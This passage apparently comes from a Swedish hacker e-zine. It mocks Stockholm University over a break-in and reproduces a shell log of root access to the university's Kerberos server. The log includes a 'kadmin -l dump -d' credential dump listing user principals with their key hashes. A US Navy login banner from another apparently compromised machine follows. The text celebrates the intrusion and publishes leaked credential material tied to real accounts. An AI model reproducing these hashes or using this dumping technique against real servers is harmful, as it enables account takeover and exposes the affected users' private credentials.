till att erknna ytterligare genom att locka med konto p feta porrsiter eller erbjuda statistroller i svenska vuxenfilmer. r du under arton kommer de dock bara att bertta fr din mamma. De kommer aldrig att ta mig levande! Knackar det p drren svljer jag en floppy med bootsektorvirus! <+---[0x07: Mobbade barn med 0dayexploitz ]-----------------------------------+> | | +---------------------------------------------------+ | Vi hade lnge undrat vilka som rootade su.se | | nr en person snllt nog mailade denna lilla | | loggen till oss, vi fick tom. alla 10k passwords! | +---------------------------------------------------+ Nu r det sagostund! Vi ska bertta sagan om nr det blev s hr: NYA LSENORD. Efter ett intrng i ett av SU:s centrala datorsystem har vi tvingats byta ut alla lsenord. Detta pverkar ditt login p campus-datorerna s vl som din mail. Ditt nya lsenord finns att hmta i informationsdisken (A-huset, plan 4) eller i vr reception (B-huset, plan 2). TAG MED DIG LEGITIMATION. Informationsdisken har extra ppet till kl. 18:00 t.o.m. torsdag p grund av detta. Det var en gng ett stort, stort, universitet. Detta universitet lg i den stora, stora, staden Stockholm, och hette sledes inget mindre n Stockholms Universitet. En dag tyckte vi att det var lmpligt med en liten, liten, utflykt till det stora, stora, universitetet. Vi hlsade sledes p i kojan bosatt av den lilla, lilla, gulliga, vovven Kerberos: uname -a;id FreeBSD kdc-master.su.se 4.0-RELEASE FreeBSD 4.0-RELEASE #0: Wed Mar 15 02:16:55 GMT 2000 jkh@monster.cdrom.com:/usr/src/sys/compile/GENERIC i386 uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) w; ps -auxwww; 1:32AM up 399 days, 10:08, 1 user, load averages: 0.00, 0.01, 0.23 USER TTY FROM LOGIN@ IDLE WHAT root p0 - Mon02PM 6days bash USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 91471 0.0 0.1 416 232 ?? R 1:32AM 0:00.00 ps -auxwww root 1 0.0 0.0 440 76 ?? ILs 16Sep01 0:00.44 /sbin/init -- root 2 0.0 0.0 0 0 ?? DL 16Sep01 41:11.37 (pagedaemon) root 3 0.0 0.0 0 0 ?? DL 16Sep01 0:09.50 (vmdaemon) root 4 0.0 0.0 0 0 ?? DL 16Sep01 0:56.72 (bufdaemon) root 5 0.0 0.0 0 0 ?? DL 16Sep01 132:01.98 (syncer) root 23 0.0 0.0 208 0 ?? IWs - 0:00.00 adjkerntz -i root 74 0.0 0.2 1212 420 ?? S<s 16Sep01 37:41.51 ntpd -p /var/run/ntpd.pid root 93 0.0 0.1 1020 144 ?? Ss 16Sep01 0:36.94 inetd -wW root 95 0.0 0.2 928 340 ?? Ss 16Sep01 4:19.97 cron root 132 0.0 0.0 844 68 ?? Is 16Sep01 0:00.06 moused -p /dev/psm0 -t auto root 154 0.0 0.0 892 0 v1 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv1 root 155 0.0 0.0 892 0 v2 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv2 root 156 0.0 0.0 892 0 v3 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv3 root 157 0.0 0.0 892 0 v4 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv4 root 158 0.0 0.0 892 0 v5 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv5 root 159 0.0 0.0 892 0 v6 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv6 root 160 0.0 0.0 892 0 v7 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv7 root 35320 0.0 0.2 1484 364 ?? Is 26Apr02 0:00.19 kpasswdd root 19130 0.0 0.2 872 344 ?? Ss 13May02 153:40.71 syslogd -s root 86260 0.0 0.1 1640 160 p1- I 4Jun02 0:00.05 bash root 43914 0.0 0.2 896 332 v0 Is+ 27Aug02 0:00.02 /usr/libexec/getty Pc ttyv0 root 9686 0.0 2.1 130224 4124 ?? S 2Oct02 31:03.95 /usr/heimdal-0.4e/libexec/ipropd-master root 9690 0.0 3.0 11172 5844 p1- S 2Oct02 317:12.10 /usr/heimdal/libexec/kdc root 63940 0.0 0.7 1880 1316 ?? Is Mon02PM 0:00.07 telnetd -a user root 63941 0.0 0.1 484 268 p0 Is Mon02PM 0:00.05 -csh (csh) root 63944 0.0 0.6 1636 1116 p0 I+ Mon02PM 0:00.05 bash root 91466 0.0 0.1 608 228 ?? Ss 1:31AM 0:00.04 //bin/sh root 0 0.0 0.0 0 0 ?? DLs 16Sep01 0:23.46 (swapper) /usr/heimdal/sbin/kadmin -l dump -d ; fa@SU.SE 1::16:e6d3fd80830ba449ba7f231346c7b3b5b3b61f4c6149a289:-::3:ba8c76c726010101:-::2:ba8c76c726010101:-::1:ba8c76c726010101:-::3:6da7867573ba205d:3/""::2:6da7867573ba205d:3/""::1:6da7867573ba205d:3/""::3:d5d3c270d6ece0f4:10/"su.se"::2:d5d3c270d6ece0f4:10/"su.se"::1:d5d3c270d6ece0f4:10/"su.se" 20020131100427:uadminw@SU.SE - - - - - - 110 20020513153445:48341:0 ft@SU.SE 2::16:1aea89515df8bc92dc6479cbfd0852ec581c9140704f137a:-::3:ab4a9e73fe257a64:-::2:ab4a9e73fe257a64:-::1:ab4a9e73fe257a64:-::3:98a84f2fcd380246:3/""::2:98a84f2fcd380246:3/""::1:98a84f2fcd380246:3/""::3:19a44561a89b73a2:10/"su.se"::2:19a44561a89b73a2:10/"su.se"::1:19a44561a89b73a2:10/"su.se" 20020128101015:viklund@SU.SE 20020430061306:ft@SU.SE - - - 86400 604800 126 20020513153445:50837:0 ja@SU.SE 2::16:0d31cd9d7a688ad5d66b024a13d08fb62951a2758fa2894f:-::3:5d40e60bb0926161:-::2:5d40e60bb0926161:-::1:5d40e60bb0926161:-::3:9b62622a2f1fd540:3/""::2:9b62622a2f1fd540:3/""::1:9b62622a2f1fd540:3/""::3:0b2998cbceb6bca2:10/"su.se"::2:0b2998cbceb6bca2:10/"su.se"::1:0b2998cbceb6bca2:10/"su.se" 20020510090359:uadminw@SU.SE 20020514075757:leifj@SU.SE - - - - - 110 20020513153445:51954:1 lv@SU.SE 1::16:40ab6d2af1eae53bfeabd05d23d61c945e89f732895b8f08:-::3:d0c4e6b95276dc54:-::2:d0c4e6b95276dc54:-::1:d0c4e6b95276dc54:-::3:dfbcaddf1098ef4f:3/""::2:dfbcaddf1098ef4f:3/""::1:dfbcaddf1098ef4f:3/""::3:9183738cdfdfcd8c:10/"su.se"::2:9183738cdfdfcd8c:10/"su.se"::1:9183738cdfdfcd8c:10/"su.se" 20020201163724:uadminw@SU.SE - - - - - - 110 20020513153445:53002:0 ma@SU.SE 1::16:e60d1a6b29d5cd616452464a7cc40be56297a479a7758cba:-::3:2fb6dc671967bc52:-::2:2fb6dc671967bc52:-::1:2fb6dc671967bc52:-::3:8501d90e011a97a2:3/""::2:8501d90e011a97a2:3/""::1:8501d90e011a97a2:3/""::3:869864a1d586ead0:10/"su.se"::2:869864a1d586ead0:10/"su.se"::1:869864a1d586ead0:10/"su.se" 20020325150349:uadminw@SU.SE - - - - - - 110 20020513153445:54049:0 mp@SU.SE 1::16:ae8f8ca2912967abb357d332d5fb9e58a7f743151ad5f716:-::3:e5fbad31baf8d637:-::2:e5fbad31baf8d637:-::1:e5fbad31baf8d637:-::3:165e4cb38c29a24c:3/""::2:165e4cb38c29a24c:3/""::1:165e4cb38c29a24c:3/""::3:a89470916da7858a:10/"su.se"::2:a89470916da7858a:10/"su.se"::1:a89470916da7858a:10/"su.se" 20020325150606:uadminw@SU.SE - - - - - - 110 20020513153445:55097:0 pb@SU.SE 1::16:190ed62ffb9ddaf268c2a14c046129584f071fc88a7abccb:-::3:73d989685e08bc98:-::2:73d989685e08bc98:-::1:73d989685e08bc98:-::3:5b34625bf8e3269d:3/""::2:5b34625bf8e3269d:3/""::1:5b34625bf8e3269d:3/""::3:d0a7c7f1d3cdf1f1:10/"su.se"::2:d0a7c7f1d3cdf1f1:10/"su.se"::1:d0a7c7f1d3cdf1f1:10/"su.se" 20020325150404:uadminw@SU.SE - - - - - - 110 20020513153445:56169:0 yb@SU.SE 1::16:e58a62ba5b499b73255b62cd0dad4a5e9ef26b910208ea61:-::3:6208c22fbab958ba:-::2:6208c22fbab958ba:-::1:6208c22fbab958ba:-::3:d0dcfd10ba982a83:3/""::2:d0dcfd10ba982a83:3/""::1:d0dcfd10ba982a83:3/""::3:949ed0a4cec8a170:10/"su.se"::2:949ed0a4cec8a170:10/"su.se"::1:949ed0a4cec8a170:10/"su.se" 20010509140411:leifj@SU.SE - - - - - - 110 20020513153445:57221:0 ys@SU.SE 1::16:1c2a19cb0d260efec164e0a1c48c2a1349a7543e975149d9:-::3:e9a8f1c2807c1f0e:-::2:e9a8f1c2807c1f0e:-::1:e9a8f1c2807c1f0e:-::3:3b29e645ecc4f231:3/""::2:3b29e645ecc4f231:3/""::1:3b29e645ecc4f231:3/""::3:9dc89768918ad361:10/"su.se"::2:9dc89768918ad361:10/"su.se"::1:9dc89768918ad361:10/"su.se" 20020325150627:uadminw@SU.SE - - - - - - 110 20020513153445:58284:0 add@SU.SE 1::16:b53d5826077f7a86cb2ac48f513e7a31a2136b5e7afe3864:-::3:2f0e10ef01b6e313:-::2:2f0e10ef01b6e313:-::1:2f0e10ef01b6e313:-::3:01010101010101f1:3/""::2:01010101010101f1:3/""::1:01010101010101f1:3/""::3:8c8fefc76283d0b5:10/"su.se"::2:8c8fefc76283d0b5:10/"su.se"::1:8c8fefc76283d0b5:10/"su.se" 20020905075036:leifj@SU.SE - - - - 86400 604800 126 20020905075036:591707:0 afs@SU.SE 1::1:e3ba9ddf98163104:-::2:e3ba9ddf98163104:-::3:e3ba9ddf98163104:-::16:6bad762013c220853be0154958ec4acbf7cd5189153ee38f:- 20000818105529:kadmin/admin@SU.SE 20000818105529:kadmin/admin@SU.SE - - - 86400 604800 126 20020513153445:59135:0 alm@SU.SE 1::16:b323f89e380be661349be65efbf7f7d58a98ce86f167bcfb:-::3:a1fdc2156d3bc758:-::2:a1fdc2156d3bc758:-::1:a1fdc2156d3bc758:-::3:2a8f94e58a40b0e6:3/""::2:2a8f94e58a40b0e6:3/""::1:2a8f94e58a40b0e6:3/""::3:a8b0d697f1918a8a:10/"su.se"::2:a8b0d697f1918a8a:10/"su.se"::1:a8b0d697f1918a8a:10/"su.se" 20020506120419:uadminw@SU.SE - - - - - - 110 20020513153445:60160:0 asa@SU.SE 1::16:3bbc4a5ed0625ec123bf7ff786ecc19220f45ec275b59e94:-::3:f43e163e51085e01:-::2:f43e163e51085e01:-::1:f43e163e51085e01:-::3:7f26c7735e0bb90d:3/""::2:7f26c7735e0bb90d:3/""::1:7f26c7735e0bb90d:3/""::3:a29ed3a4ea91f2a2:10/"su.se"::2:a29ed3a4ea91f2a2:10/"su.se"::1:a29ed3a4ea91f2a2:10/"su.se" 20020415070114:uadminw@SU.SE - - - - - - 110 20020513153445:61212:0 asc@SU.SE 1::16:3b54da19a70d67ab400b709873f808f88975136be9b98080:-::3:107694082697f473:-::2:107694082697f473:-::1:107694082697f473:-::3:97e92cb9078c20fb:3/""::2:97e92cb9078c20fb:3/""::1:97e92cb9078c20fb:3/""::3:8a61dcb367ef9bb0:10/"su.se"::2:8a61dcb367ef9bb0:10/"su.se"::1:8a61dcb367ef9bb0:10/"su.se" 20020325150412:uadminw@SU.SE - - - - - - 110 20020513153445:62425:0 # #Hr fortsatte listjveln med 10000 rader, knns inte som vi orkar med det. # ... Och detta var alts pudelns krna +-----------------------------------------------------------------------------+> Sun Microsystems Inc. SunOS 5.8 Generic February 2000 WARNING: This is a U. S. Government Computer System. Unauthorized access is prohibited by Title 18, United States Code, Section 1030 --------------- Only UNCLASSIFIED Material On This Machine ----------------- Department of the Navy Automated Information Systems and related equipment are intended for the communication, processing and storage of U.S. Government information. These systems and equipment are subject to monitoring to ensure proper functioning, to protect against improper or unauthorized use or access, and to verify the presence or performance of applicable security features or procedures, and for other like purposes. Such monitoring may result in the acquisition, recording, and analysis of all data being communicated, transmitted, processed or stored in this system by a user. If monitoring reveals evidence of possible criminal activity, such evidence may be provided to law enforcement personnel. Use of this system constitutes consent to such monitoring. Use of this or any other DoD interest computer system constitutes a consent to monitoring at all times. You have mail. source idl_setup Enabling TeX & LaTeX # +-----------------------------------------------------------------------------+>